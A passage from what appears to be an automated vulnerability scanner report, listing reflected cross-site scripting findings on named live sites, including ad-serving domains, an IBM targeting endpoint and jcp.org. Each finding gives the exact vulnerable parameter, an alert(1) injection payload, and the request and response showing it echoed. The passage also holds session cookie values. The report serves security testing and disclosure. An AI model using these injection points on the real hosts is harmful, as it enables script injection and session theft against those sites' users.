Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:54:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-17; path=/; expires=Fri, 16-Dec-2011 00:54:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb549359=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb201818=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII2IgDEAoYUSBRKFEwzN_P8wQQzN_P8wQYUA..; path=/; expires=Fri, 16-Dec-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb884=![nC'208WMcbJO=)IE.8$p5s4?enc=AAAAAAAA0D8zMzMzMzPLPwAAAAAAABRAMzMzMzMzyz8AAAAAAADQP8hj40ddzOJZ7__________L73NOAAAAAP7HBwACAgAAHgAAAAMAAACpIQUAiwMBAAEAAABVU0QAVVNEACwB-gAKJwAAzxEBAgUCAQUAAAAAdx2drAAAAAA.&tt_code=2298003&click=http://g.ca.bid.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtjDEOwDAIA78SMXcADI7SN0XdOlX9e0HqdD7Z8Agg5zBNRB5D4GU0WrLMSoQxuYhlae5QrAjpZXczXWdbn3kxf0bxuveuyP5PV8P7AXsaFSU-%26redirectURL=&pixel=http://g.ca.bid.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26ex_uid=2_-17%26creativeID=112554%26message=eJwtjDEOwDAIA78SMXcADI7SN0XdOlX9e0HqdD7Z8Agg5zBNRB5D4GU0WrLMSoQxuYhlae5QrAjpZXczXWdbn3kxf0bxuveuyP5PV8P7AXsaFSU-%26managed=false&media_subtypes=1; path=/; expires=Sun, 18-Sep-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3Z#yJ16m@n8l)=m!zsC8%0Q!816usE!>w6Lc1t!<6-c4nLmV#(f3[iRHV@?K@i[?NGU:QTKx<k4Ji.4N$kk1OJY^A'Bdr9u)1l85nIwbM6sex^qF_k7^/suduT>zr!%>zw81Y'8Y7?BMSJYDNCC'Y#an; path=/; expires=Fri, 16-Dec-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:54:36 GMT
Content-Length: 246

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=20&Z=300x250&s=2298003&r=1&_salt=1775927586&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com/a19be';alert(1)//63b277fa96a">
...[SNIP]...

4.116. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ibmwebsphere.tt.omtrdc.net
Path:   /m2/ibmwebsphere/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 36dcc<script>alert(1)</script>39a607c6ef6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/ibmwebsphere/mbox/standard?mboxHost=www-142.ibm.com&mboxSession=1316221012167-554408&mboxPage=1316221012167-554408&screenHeight=1200&screenWidth=1920&browserWidth=1106&browserHeight=789&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=eps_bykeyword_search36dcc<script>alert(1)</script>39a607c6ef6&mboxId=0&mboxTime=1316203014547&mboxURL=http%3A%2F%2Fwww-142.ibm.com%2Fsoftware%2Fproducts%2Fus%2Fen%2Fsearch%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: ibmwebsphere.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-142.ibm.com/software/products/us/en/search?pgel=lnav&hppcode=1&st=new&q1=xss
Cookie: mboxSession=1316221012167-554408; mboxPC=1316221012167-554408.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1316221012167-554408.19; Domain=ibmwebsphere.tt.omtrdc.net; Expires=Fri, 30-Sep-2011 19:56:52 GMT; Path=/m2/ibmwebsphere
Content-Type: text/javascript
Content-Length: 216
Date: Fri, 16 Sep 2011 19:56:52 GMT
Server: Test & Target

mboxFactories.get('default').get('eps_bykeyword_search36dcc<script>alert(1)</script>39a607c6ef6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316221012167-554408.19");

4.117. http://imp.fetchback.com/serve/fb/adtag.js [clicktracking parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktracking request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c993b"-alert(1)-"79e3f04e7ed was submitted in the clicktracking parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2Cc993b"-alert(1)-"79e3f04e7ed HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1316220749_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:29 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 575

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaS
...[SNIP]...
2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2Cc993b"-alert(1)-"79e3f04e7ed' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

4.118. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5581f"-alert(1)-"11bcd5d0490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C&5581f"-alert(1)-"11bcd5d0490=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:31 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1316220751_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:31 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 578

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaS
...[SNIP]...
DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C&5581f"-alert(1)-"11bcd5d0490=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

4.119. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95638"-alert(1)-"4bc29a81874 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect95638"-alert(1)-"4bc29a81874&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:27 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1316220747_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:27 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 575

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect95638"-alert(1)-"4bc29a81874&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9
...[SNIP]...

4.120. http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jcp.org
Path:   /en/jsr/all

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284c1"><script>alert(1)</script>451b1e39851 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1 HTTP/1.1
Host: jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:57:07 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 411049


<!-- ** BEGIN: header.jsp ** //-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>



...[SNIP]...
<input name="uri" value="/en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1" type="hidden">
...[SNIP]...

4.121. http://js.revsci.net/gateway/gw.js [ali parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the ali request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea4cb'%3balert(1)//4b86e2820c was submitted in the ali parameter. This input was echoed as ea4cb';alert(1)//4b86e2820c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023ea4cb'%3balert(1)//4b86e2820c&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:48 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:48 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:48 GMT
Content-Length: 5217

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
);
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023ea4cb';alert(1)//4b86e2820c');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();

4.122. http://js.revsci.net/gateway/gw.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe30b'%3balert(1)//803e9c23130 was submitted in the cid parameter. This input was echoed as fe30b';alert(1)//803e9c23130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627fe30b'%3balert(1)//803e9c23130&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:48 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:48 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:48 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627fe30b';alert(1)//803e9c23130');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();

4.123. http://js.revsci.net/gateway/gw.js [clen parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the clen request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31fab'%3balert(1)//0fad37552c8 was submitted in the clen parameter. This input was echoed as 31fab';alert(1)//0fad37552c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=32831fab'%3balert(1)//0fad37552c8&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:35 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:35 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:34 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
csid);
if(window[rsi_csid])window[rsi_csid].rsi_ral(1);else rsi_ral(1);
if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','32831fab';alert(1)//0fad37552c8');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '332902
...[SNIP]...

4.124. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 7ec98<script>alert(1)</script>b1efe77bc87 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?auto=t&csid=A108687ec98<script>alert(1)</script>b1efe77bc87&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:29 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:29 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:29 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "A108687EC98<SCRIPT>ALERT(1)</SCRIPT>B1EFE77BC87" was not recognized.
*/

4.125. http://js.revsci.net/gateway/gw.js [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the p request parameter is copied into a JavaScript string which i